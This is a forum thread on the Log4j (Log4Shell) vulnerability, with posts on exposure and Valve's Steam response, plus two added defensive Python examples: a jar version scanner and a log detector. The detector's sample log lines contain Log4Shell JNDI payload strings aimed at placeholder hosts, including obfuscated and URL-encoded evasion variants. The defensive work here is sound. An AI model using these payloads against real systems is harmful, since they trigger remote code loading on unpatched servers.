2 years ago

Yeah, this is a big deal. And whilst the big guys will patch it out almost immediately, or stop using the logging program, you just know there will be hundreds of thousands of small companies and individuals affected by this. As the server guy for my company, I was informed about it and checked it out straight away; luckily, the only plugin we have which might have been affected is uninstalled on our servers. But it's going to catch a lot of people out. Anyone who runs a server needs to see this and check if anything they have installed is using log4j.
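
The check the poster describes, as an added example (not code from the thread, any poster, or the Log4j project): walk a directory tree, open every jar/war/ear, read the log4j-core version from its Maven pom.properties and test whether the JndiLookup class is still inside. The version thresholds are the published fix releases for CVE-2021-44228 (2.15.0, plus the 2.12.2 and 2.3.1 backports for Java 7 and 6), and a jar with the lookup class deleted is treated as mitigated, which was the documented workaround. The fixture jars the script builds for its own demo are constructed stubs, not real artefacts.

```python
"""Scan a directory tree for Log4j 2 jars, including jars nested inside
.war/.ear archives, and report which ones still ship JndiLookup.class.
Added example, not from the thread or the Log4j project."""
import io
import os
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
FIXED_BACKPORTS = {(2, 12, 2), (2, 3, 1)}   # Java 7 / Java 6 fixes for CVE-2021-44228


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); a pre-release like '2.0-beta9' parses as (2, 0, 0)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    return tuple(int(g or 0) for g in m.groups()) if m else None


def is_vulnerable(version, has_jndi_class):
    """Exposed when log4j-core < 2.15.0 (and not a fixed backport) and the
    JndiLookup class has not been removed from the jar."""
    if not has_jndi_class:
        return False        # class deleted: the documented workaround
    if version is None:
        return True         # lookup class present but version unknown: treat as exposed
    return version < (2, 15, 0) and version not in FIXED_BACKPORTS


def inspect_archive(zf, path):
    """Yield (path, version, has_jndi_class) for this archive and any nested one."""
    names = set(zf.namelist())
    version = None
    if POM_PROPS in names:
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = parse_version(line.split("=", 1)[1].strip())
    if version is not None or JNDI_CLASS in names:
        yield path, version, JNDI_CLASS in names
    for name in names:                      # recurse into jars packed in wars/ears
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    yield from inspect_archive(inner, path + "!" + name)
            except zipfile.BadZipFile:
                continue


def scan_tree(root):
    """Return one finding dict per log4j-core artefact found under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(ARCHIVE_EXT):
                continue
            full = os.path.join(dirpath, fname)
            try:
                with zipfile.ZipFile(full) as zf:
                    for path, version, has_cls in inspect_archive(zf, full):
                        findings.append({
                            "path": path,
                            "version": ".".join(map(str, version)) if version else "unknown",
                            "jndi_lookup_present": has_cls,
                            "vulnerable": is_vulnerable(version, has_cls),
                        })
            except zipfile.BadZipFile:
                continue
    return findings


def build_sample_tree(root):
    """Constructed fixtures, not real artefacts: stub jars holding only a
    pom.properties and (optionally) a four-byte placeholder JndiLookup.class."""
    def fake_jar(version, with_jndi_class=True):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr(POM_PROPS, "version=%s\n" % version)
            if with_jndi_class:
                zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")   # class-file magic only
        return buf.getvalue()

    lib = os.path.join(root, "lib")
    os.makedirs(lib, exist_ok=True)
    samples = {
        "log4j-core-2.14.1.jar": fake_jar("2.14.1"),                  # vulnerable
        "log4j-core-2.17.1.jar": fake_jar("2.17.1"),                  # fixed
        "log4j-core-2.14.1-stripped.jar": fake_jar("2.14.1", False),  # class removed
    }
    for fname, data in samples.items():
        with open(os.path.join(lib, fname), "wb") as f:
            f.write(data)
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:  # nested copy
        war.writestr("WEB-INF/lib/log4j-core-2.12.1.jar", fake_jar("2.12.1"))


def demo_scan():
    """Build the fixtures in a temp dir, scan them, key the findings by jar name."""
    root = tempfile.mkdtemp()
    build_sample_tree(root)
    return {os.path.basename(f["path"]): f for f in scan_tree(root)}


if __name__ == "__main__":
    import sys
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo_scan().values()
    for f in results:
        print("%-10s %-8s %s" % ("VULNERABLE" if f["vulnerable"] else "ok", f["version"], f["path"]))
```

Run it with a directory argument (for example the application's lib folder or a Tomcat webapps tree) to scan real files; with no argument it scans its own constructed fixtures. Shaded or "fat" jars that bundle log4j classes without the Maven metadata are reported with version "unknown" and flagged purely on the presence of JndiLookup.class.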

2 years ago

Yes, this is bad. Regarding Steam, they already acted to prevent damage:

Comment by JonP_valve:

We immediately reviewed our services that use log4j and verified that our network security rules blocked downloading and executing untrusted code. We do not believe there are any risks to Steam associated with this vulnerability.

Comment by JonP_valve:

The early discussion on twitter mentioned Steam specifically but they were talking strictly about the server side - not the Steam client. It appears they were using "a DNS lookup occurred" as enough to indicate a potentially-vulnerable system. However, we were able to confirm that Steam servers were not at risk of running untrusted external code via this log4j issue.

2 years ago

I saw a mention where someone tested the attack on the Steam search box by using the proof-of-concept ${jndi:ldap} thing with a DNS logger:

https://news.ycombinator.com/item?id=29499867
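
What that kind of probe looks like from the defender's side, as an added example (not from the thread or the Hacker News post): a log scanner that finds the `${jndi:...}` lookup string in request logs, including the nested-lookup obfuscations (`${lower:j}`, `${::-j}`, `${env:X:-j}`) and URL-encoding that attackers used to get past a plain grep for `${jndi:`. It pulls out the callback host, which is the indicator you would then match against your DNS or egress logs, the same "a DNS lookup occurred" signal the Valve comment above refers to. The access-log lines are constructed for the example, not captured traffic, and the hosts in them are documentation-range addresses.

```python
"""Find Log4Shell lookup strings (CVE-2021-44228) in log lines, after peeling
URL-encoding and the nested-lookup tricks used to hide the word 'jndi'.
Added example, not from the thread; SAMPLE_LOG below is constructed."""
import re
from urllib.parse import unquote

# An innermost ${...}: its body contains no further '${' or '}'.
INNER = re.compile(r"\$\{([^${}]*)\}")
# ${jndi:<scheme>://<host[:port]>...}; whitespace tolerated, case-insensitive.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//\s*([^/\s}]+)", re.IGNORECASE)


def resolve_obfuscation(text):
    """Collapse the lookups attackers wrap around 'jndi' to disguise it:
    ${lower:X} -> x, ${upper:X} -> X, ${anything:-default} -> default
    (covers ${::-j} and ${env:NOPE:-j}). Other lookups, including the final
    ${jndi:...} itself, are left untouched so they can be matched."""
    def fold(m):
        body = m.group(1)
        key, sep, rest = body.partition(":")
        if key.lower() == "jndi":
            return m.group(0)                 # never rewrite the payload itself
        if sep and key.lower() == "lower":
            return rest.lower()
        if sep and key.lower() == "upper":
            return rest.upper()
        if ":-" in body:                      # default-value syntax
            return body.split(":-", 1)[1]
        return m.group(0)                     # unknown lookup, keep verbatim

    prev = None
    while prev != text:                       # every rewrite shortens the text, so this ends
        prev, text = text, INNER.sub(fold, text)
    return text


def find_jndi_lookups(line):
    """Return [(scheme, target, matched_text)] for each JNDI lookup in the line."""
    decoded = line
    for _ in range(3):                        # peel repeated URL-encoding layers
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    normalized = resolve_obfuscation(decoded)
    return [(m.group(1).lower(), m.group(2), m.group(0)) for m in JNDI.finditer(normalized)]


def scan_log(lines):
    """Return [(line_number, scheme, target), ...] for lines carrying a JNDI lookup."""
    return [(n, scheme, target)
            for n, line in enumerate(lines, 1)
            for scheme, target, _ in find_jndi_lookups(line)]


# Constructed Apache-style access log lines, not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:13 +0000] "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2Fprobe.example.net%2Fx%7D HTTP/1.1" 200 512 "-" "curl/7.68"',
    '10.0.0.9 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.7:1099/obj}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//dns.example.org/z}"',
    '10.0.0.4 - - [10/Dec/2021:14:02:16 +0000] "GET /docs/${version} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, scheme, target in scan_log(SAMPLE_LOG):
        print("line %d: jndi %s lookup to %s" % (n, scheme, target))
```

The last sample line shows why the normaliser leaves unknown lookups alone: `${version}` in a URL is noise, not an attack, and only the `jndi:` prefix counts. Feed real lines in with `scan_log(open(path))`; the hosts it returns are what to look for in outbound DNS and LDAP/RMI connection logs to tell a scan that merely triggered a lookup from one that reached a listener.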

2 years ago

If anybody needs extra info, here is a list of security advisories per company (not mine, just spreading info):

https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592

2 years ago

Actual explanation of the attack:

https://www.lunasec.io/docs/blog/log4j-zero-day/

2 years ago

Closed 1 year ago by AmanoTC.